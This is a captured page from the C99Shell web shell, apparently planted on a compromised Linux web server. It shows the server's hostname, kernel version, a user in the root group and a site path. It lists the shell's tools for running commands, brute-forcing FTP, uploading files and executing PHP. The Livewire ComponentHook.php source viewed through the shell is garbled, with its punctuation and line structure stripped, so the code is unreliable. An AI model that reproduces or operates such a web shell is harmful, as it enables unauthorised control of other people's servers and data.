!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/livewire/livewire/src/   drwxr-xr-x
Free 28.47 GB of 117.98 GB (24.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ComponentHook.php (2.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Livewire;

abstract class 
ComponentHook
{
    protected 
$component;

    function 
setComponent($component)
    {
        
$this->component $component;
    }

    function 
callBoot(...$params) {
        if (
method_exists($this'boot')) $this->boot(...$params);
    }

    function 
callMount(...$params) {
        if (
method_exists($this'mount')) $this->mount(...$params);
    }

    function 
callHydrate(...$params) {
        if (
method_exists($this'hydrate')) $this->hydrate(...$params);
    }

    function 
callUpdate($propertyName$fullPath$newValue) {
        
$callbacks = [];

        if (
method_exists($this'update')) $callbacks[] = $this->update($propertyName$fullPath$newValue);

        return function (...
$params) use ($callbacks) {
            foreach (
$callbacks as $callback) {
                if (
is_callable($callback)) $callback(...$params);
            }
        };
    }

    function 
callCall($method$params$returnEarly) {
        
$callbacks = [];

        if (
method_exists($this'call')) $callbacks[] = $this->call($method$params$returnEarly);

        return function (...
$params) use ($callbacks) {
            foreach (
$callbacks as $callback) {
                if (
is_callable($callback)) $callback(...$params);
            }
        };
    }

    function 
callRender(...$params) {
        
$callbacks = [];

        if (
method_exists($this'render')) $callbacks[] = $this->render(...$params);

        return function (...
$params) use ($callbacks) {
            foreach (
$callbacks as $callback) {
                if (
is_callable($callback)) $callback(...$params);
            }
        };
    }

    function 
callDehydrate(...$params) {
        if (
method_exists($this'dehydrate')) $this->dehydrate(...$params);
    }

    function 
callDestroy(...$params) {
        if (
method_exists($this'destroy')) $this->destroy(...$params);
    }

    function 
callException(...$params) {
        if (
method_exists($this'exception')) $this->exception(...$params);
    }

    function 
getProperties()
    {
        return 
$this->component->all();
    }

    function 
getProperty($name)
    {
        return 
data_get($this->getProperties(), $name);
    }

    function 
storeSet($key$value)
    {
        
store($this->component)->set($key$value);
    }

    function 
storePush($key$value$iKey null)
    {
        
store($this->component)->push($key$value$iKey);
    }

    function 
storeGet($key$default null)
    {
        return 
store($this->component)->get($key$default);
    }

    function 
storeHas($key)
    {
        return 
store($this->component)->has($key);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--